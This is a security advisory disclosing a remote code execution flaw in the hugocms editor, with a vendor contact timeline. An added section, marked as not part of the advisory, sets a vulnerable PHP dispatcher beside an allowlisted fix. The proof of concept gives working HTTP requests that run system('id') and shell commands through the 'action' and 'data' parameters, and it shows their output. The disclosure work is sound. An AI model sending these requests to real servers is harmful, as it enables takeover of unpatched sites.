usd-2023-0037 | Remote Code Execution in hugocms

Advisory ID: usd-2023-0037
Product: hugocms
Affected Version: (latest as of 25.09.2023; commit 77443d6)
Vulnerability Type: CWE-913: Improper Control of Dynamically-Managed Code Resources
Security Risk: HIGH
Vendor URL: https://hugoeditor.com/
Vendor Acknowledged Vulnerability: Yes
Vendor Status: Fixed
Advisory Status: Published
CVE Number: CVE-2023-49326
First Published: 2024-07-18
Last Update: 2024-07-18

Description

The application hugocms, developed by Inter-Data, provides a frontend for the static site generator hugo to manage posts, media, and configuration of a hugo website. The application does not provide any access-control mechanism of its own and recommends restricting access via a web server's basic-auth capabilities; without such a restriction, anyone who can reach the editor path can use it.

Users with access to hugocms can call arbitrary PHP functions via the unfiltered action request parameter, with the data parameter passed as the function's argument. Calling system() this way leads to remote code execution on the web server. The flaw is located in the script hugocms/editor.os.control.php and can be triggered by a GET or POST request to hugocms/editor.control.php.

Proof of Concept

The following request triggers execution of phpinfo():

GET /public/edit/hugocms/editor.control.php?action=phpinfo HTTP/1.1
Host: 10.1.1.157

The following request uses PHP's system() function to execute commands on the host system:

Request:

GET /public/edit/hugocms/editor.control.php?action=system&data=id HTTP/1.1
Host: 10.1.1.157

Response:

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 18:32:53 GMT
Server: Apache/2.4.57 (Debian)
Content-Length: 54
Content-Type: application/json

uid=33(www-data) gid=33(www-data) groups=33(www-data)

The following request uses hugocms' own editor\execute function, which hands the data parameter to a shell, to execute commands on the host system:

Request:

POST /public/edit/hugocms/editor.control.php HTTP/1.1
Host: 10.1.1.157
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 42

action=editor\execute&data=id+%26%26+false

Response:

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 18:35:37 GMT
Server: Apache/2.4.57 (Debian)
Content-Length: 91
Content-Type: application/json

{ "success":false, "debug":"uid=33(www-data) gid=33(www-data) groups=33(www-data) <br />" }
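As an added example that is not part of this advisory and not hugocms' own code, the following PHP sketch reconstructs the dispatch pattern that the description and the proof-of-concept requests imply (a request parameter used directly as a variable-function name, CWE-913) and places an allowlisted dispatcher beside it. Every name in it (dispatch_vulnerable, dispatch_safe, the action names, the in-memory $posts array) is an assumption for illustration; the real hugocms source and the vendor's fix were not inspected for this example.

```php
<?php
// Added example, not hugocms code: a hypothetical reconstruction of the
// dispatch pattern the advisory describes (CWE-913), next to an allowlisted
// replacement. All names here (dispatch_vulnerable, dispatch_safe, $posts,
// the action names) are assumptions for illustration.

// Vulnerable pattern: the request parameter itself becomes the callable.
// PHP's variable-function syntax resolves "phpinfo", "system" or a
// namespaced name such as "editor\execute" and calls it with the
// attacker-controlled $data argument. This is what the proof-of-concept
// requests exercise.
function dispatch_vulnerable(array $request)
{
    $action = (string) ($request['action'] ?? '');
    $data   = (string) ($request['data'] ?? '');
    return $action($data);   // ?action=system&data=id  =>  system('id')
}

// Hardened pattern: a fixed map from public action names to closures.
// The lookup is an exact string match against the map's keys, so no
// callable is ever derived from user input, and each handler validates
// its own argument. No handler hands request data to a shell; if a
// command must run, invoke a fixed binary and wrap its arguments with
// escapeshellarg().
function dispatch_safe(array $request, array $posts): array
{
    $handlers = [
        'list' => function (string $unused) use ($posts): array {
            return ['success' => true, 'posts' => array_keys($posts)];
        },
        'read' => function (string $slug) use ($posts): array {
            // Slugs are restricted to a small character set and length
            // before they are used as a lookup key.
            if (!preg_match('/\A[a-z0-9-]{1,64}\z/', $slug)) {
                return ['success' => false, 'error' => 'invalid slug'];
            }
            if (!array_key_exists($slug, $posts)) {
                return ['success' => false, 'error' => 'not found'];
            }
            return ['success' => true, 'content' => $posts[$slug]];
        },
    ];

    $action = (string) ($request['action'] ?? '');
    $data   = (string) ($request['data'] ?? '');

    if (!array_key_exists($action, $handlers)) {
        // "system", "phpinfo" and "editor\execute" all end here.
        return ['success' => false, 'error' => 'unknown action'];
    }
    return $handlers[$action]($data);
}

// Demo with constructed in-memory posts instead of a hugo content directory.
$posts = ['hello-world' => '# Hello', 'about' => '# About'];

echo json_encode(dispatch_safe(['action' => 'list'], $posts)), PHP_EOL;
echo json_encode(dispatch_safe(['action' => 'read', 'data' => 'about'], $posts)), PHP_EOL;
echo json_encode(dispatch_safe(['action' => 'system', 'data' => 'id'], $posts)), PHP_EOL;
echo json_encode(dispatch_safe(['action' => 'editor\\execute', 'data' => 'id && false'], $posts)), PHP_EOL;
```

The point of the hardened version is that the set of reachable functions is closed at development time: adding a new action means adding a key to the map, and a request naming anything else is answered with an error before any call is made. A function that runs shell commands, such as the editor\execute seen in the proof of concept, should never be reachable through a generic dispatcher at all; if the application genuinely needs to run hugo, it should call a fixed binary with escaped arguments rather than pass a user-supplied string to a shell.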

Timeline

  • 2023-09-25: Vulnerability identified by Florian Dewald.
  • 2023-10-02: Sent first contact request.
  • 2023-10-16: Sent reminder email mentioning disclosure deadline.
  • 2023-10-25: Sent another reminder stressing that vulnerabilities will be publicly disclosed.
  • 2023-11-13: Sent another reminder stressing our deadline and that vulnerabilities will be publicly disclosed if we receive no answer.
  • 2023-11-22: Reached vendor via phone, sent vulnerability information.
  • 2023-12-04: Sent status update request to info@inter-data.de.
  • 2023-12-06: Inter-Data reports that a fix is being worked on.
  • 2024-01-03: According to Inter-Data a fix is in the works and should be finished soon.
  • 2024-01-24: Reached out to Inter-Data for another status update.
  • 2024-01-26: Inter-Data reports that the vulnerability is fixed.
  • 2024-07-18: This advisory is published.

Credits

This security vulnerability was identified by Florian Dewald of usd AG.